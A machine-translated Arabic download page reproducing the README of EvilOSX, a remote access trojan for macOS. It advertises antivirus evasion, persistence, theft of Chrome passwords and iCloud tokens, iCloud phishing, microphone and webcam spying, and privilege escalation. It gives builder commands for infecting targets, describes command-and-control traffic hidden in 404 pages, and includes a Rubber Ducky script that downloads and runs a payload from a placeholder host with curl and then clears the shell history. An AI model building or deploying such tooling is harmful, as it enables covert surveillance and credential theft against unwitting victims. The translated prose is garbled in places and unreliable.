الصفحة الرئيسية>المتعلقة بالبرمجة>شفرة المصدر الأخرى
تنزيل


شعار
Evilosx

فأر شرير (أداة الإدارة عن بُعد) لـ MacOS / OS X.

مولد ماركو بواسطة Cedric Owens

لم يعد هذا المشروع نشطًا

سمات

  • محاكاة مثيل طرفي
  • نظام الوحدة النمطية البسيطة
  • لا تبعيات روبوت (بيثون نقي)
  • لم يتم اكتشافه بواسطة مكافحة الفيروسات (Openssl AES-256 PHOLOLLOLS المشفرة)
  • مثابر
  • دعم واجهة المستخدم الرسومية و CLI
  • استرداد كلمات مرور الكروم
  • استرجاع الرموز المميزة والاتصالات iCloud
  • استرداد/مراقبة الحافظة
  • استرداد تاريخ المتصفح (الكروم و Safari)
  • phish لكلمات مرور iCloud عبر iTunes
  • itunes (iOS) تعداد النسخ الاحتياطي
  • سجل الميكروفون
  • خذ لقطة شاشة أو صورة سطح المكتب باستخدام كاميرا الويب
  • محاولة الحصول على الجذر عبر تصعيد الامتياز المحلي

كيفية استخدام 

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

تحذير: نظرًا لأن الأحمال التي يتم إنشاؤها فريدة من نوعها للنظام المستهدف (تلقائيًا بواسطة الخادم) ، يجب أن يكون الخادم قيد التشغيل عندما يتصل أي روبوت لأول مرة.

المستخدمين المتقدمين

هناك أيضًا CLI لأولئك الذين يرغبون في استخدام هذا على SSH: 

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s)

لقطات الشاشة

تحفيز

تم إنشاء هذا المشروع ليتم استخدامه مع حبيبي المطاط ، وإليك البرنامج النصي البسيط: 

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • يستغرق الأمر حوالي 10 ثوانٍ للورق المتخلف عن أي جهاز Mac غير مقفلة ، وهو جميل ...... لطيف
  • يتم تهجئة Termina L بهذه الطريقة عن قصد ، على بعض الأنظمة لن تجد Spotlight المحطة على خلاف ذلك.
  • لتجاوز مساعد إعداد لوحة المفاتيح ، تأكد من تغيير VID & PID الذي يمكن العثور عليه هنا.
    لوحة مفاتيح الألومنيوم (ISO) هي التي تبحث عنها.

الإصدار

سيتم الحفاظ على EvilOSX بموجب إرشادات الإصدار الدلالي قدر الإمكان.
سيتم ترقيم إصدارات الخادم والبروت مع تنسيق المتابعة: 

 <major>.<minor>.<patch>

وبنيت مع الإرشادات التالية:

  • كسر التوافق الخلفي (مع روبوتات أقدم) يصطدم بالرائد
  • الإضافات الجديدة دون كسر التوافق الخلفي يطالب القاصر
  • إصلاحات الأخطاء وإصلاحها تتغير تصحيح التصحيح

لمزيد من المعلومات حول Semver ، يرجى زيارة https://semver.org/.

ملاحظات التصميم

  • يتم تقسيم إصابة الجهاز إلى ثلاثة أجزاء:
    • يتم تشغيل قاذفة على الجهاز المستهدف الذي هدفه الوحيد هو تشغيل Stager
    • يسأل Stager الخادم عن محمل يتولى كيفية تحميل الحمولة الحمولة
    • يتم إعطاء المحمل حمولة مشفرة فريدة ثم إرسالها إلى Stager
  • يخفي الخادم اتصالاته عن طريق إرسال رسائل مخبأة في صفحات الأخطاء HTTP 404 (من "الاختباء في مرأى" من Blackhat)
    • يتم استرداد طلبات الأوامر من الخادم عبر طلب الحصول على
    • يتم إرسال ردود الأوامر إلى الخادم عبر طلب البريد
  • تستفيد الوحدات النمطية من الطبيعة الديناميكية لـ Python ، يتم إرسالها ببساطة عبر الشبكة المضغوطة بـ ZLIB ، إلى جانب أي خيارات تكوين
  • نظرًا لأن الروبوت يتواصل مع الخادم فقط وليس في العكس

مشاكل

لا تتردد في تقديم أي مشكلات أو طلبات ميزة هنا.

المساهمة

للحصول على دليل بسيط حول كيفية إنشاء وحدات انقر هنا.

الاعتمادات

  • مشروع الإمبراطورية الرائع
  • يصرخ إلى باتريك واردل لمحادثاته الرائعة ، تحقق من الهدف
  • Manwhoami لمشاريعه: OsxChromedEcrypt ، mmetokendecrypt ، iCloudContacts
    (تم حذفه الآن ... اسمحوا لي أن أعرف إذا كنت تظهر)
  • يتم نسخ وحدة Slowloris إلى حد كبير من Pyslowloris
  • URWID وهذا الرمز الذي أنقذني الكثير من الوقت مع CLI
  • الشعار الذي أنشأته Motusora

رخصة

GPLV3

يوسع
معلومات إضافية
تطبيقات ذات صلة
نوصي لك
أخبار ذات صلة الكل